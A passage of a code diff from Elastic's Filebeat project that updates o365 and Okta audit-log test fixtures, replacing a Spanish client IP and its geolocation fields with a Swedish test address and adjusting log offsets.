         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:06:08",
         "o365.audit.ErrorNumber": "0",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2760,20 +2716,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
@@ -2791,8 +2747,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:06:34.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2810,7 +2766,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 39044,
+        "log.offset": 39012,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2823,10 +2779,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:06:34",
         "o365.audit.ErrorNumber": "0",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2854,20 +2810,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
@@ -2885,8 +2841,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:06:07.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2904,7 +2860,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 40306,
+        "log.offset": 40274,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2917,10 +2873,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
         "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:06:07",
         "o365.audit.ErrorNumber": "0",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2948,20 +2904,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
@@ -2996,7 +2952,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 41567,
+        "log.offset": 41535,
         "o365.audit.Actor": [
             {
                 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -3097,7 +3053,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 43022,
+        "log.offset": 42990,
         "o365.audit.Actor": [
             {
                 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -3175,8 +3131,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:05:59.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoginFailed",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3194,7 +3150,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 44362,
+        "log.offset": 44330,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3207,10 +3163,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:05:59",
         "o365.audit.ErrorNumber": "50072",
         "o365.audit.ExtendedProperties.RequestType": "Login:login",
@@ -3240,20 +3196,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
@@ -3271,8 +3227,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:05:59.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoginFailed",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3290,7 +3246,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 45730,
+        "log.offset": 45698,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3303,10 +3259,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:05:59",
         "o365.audit.ErrorNumber": "50072",
         "o365.audit.ExtendedProperties.RequestType": "Login:login",
@@ -3336,20 +3292,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
@@ -3367,8 +3323,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:06:07.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3386,7 +3342,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 47098,
+        "log.offset": 47066,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3399,10 +3355,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:06:07",
         "o365.audit.ErrorNumber": "0",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -3430,20 +3386,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/o365/audit/test/str-params.log b/x-pack/filebeat/module/o365/audit/test/str-params.log
index d5856330b9be..2ad00a12e478 100644
--- a/x-pack/filebeat/module/o365/audit/test/str-params.log
+++ b/x-pack/filebeat/module/o365/audit/test/str-params.log
@@ -1,2 +1,2 @@
 {"OriginatingServer": "HE1PR0102MB3228 (15.20.2707.017)", "ClientAppId": "", "OrganizationName": "testsiem.onmicrosoft.com", "ObjectId": "EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}", "Parameters": "-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")", "Workload": "Exchange", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T20:49:49", "AppId": "", "UserId": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "UserType": 3, "Version": 1, "ResultStatus": "True", "ExternalAccess": true, "UserKey": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "Operation": "Set-Mailbox", "Id": "1c7412a6-858d-49ff-3f93-08d7ac0f45bf", "RecordType": 1}
-{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"","ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"","ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
diff --git a/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json b/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json
index 764d9283acfd..6f1d4a83b54e 100644
--- a/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json
@@ -45,8 +45,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:06:07.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -77,10 +77,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:06:07",
         "o365.audit.ErrorNumber": "0",
         "o365.audit.ExtendedProperties._raw": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"",
@@ -106,20 +106,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log
index b21d1eca1e16..6c4aa40edfc8 100644
--- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log
+++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log
@@ -1,5 +1,5 @@
-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102nZHzd6OHSfGG51vsoc22gw","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"authnRequestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestId":"XkccyyMli2Uay2I93ZgRzQAAB0c","requestUri":"/login/signout","threatSuspected":"false","url":"/login/signout?message=login_page_messages.session_has_expired"}},"displayMessage":"User logout from Okta","eventType":"user.session.end","legacyEventType":"core.user_auth.logout_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T22:18:51.843Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkccyyMli2Uay2I93ZgRzQAAB0c","type":"WEB"},"uuid":"faf7398a-4f77-11ea-97fb-5925e98228bd","version":"0"}
-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"User login to Okta","eventType":"user.session.start","legacyEventType":"core.user_auth.login_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.718Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3aeede38-4f67-11ea-abd3-1f5d113f2546","version":"0"}
-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3af594f9-4f67-11ea-abd3-1f5d113f2546","version":"0"}
-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"<random_id_string>","requestUri":"<uri_endpoint>","threatSuspected":"false","url":"<url>","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United Sates","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"36a3b6b3-fcc0-47a0-96bd-95330cfdb658","version":"0"}
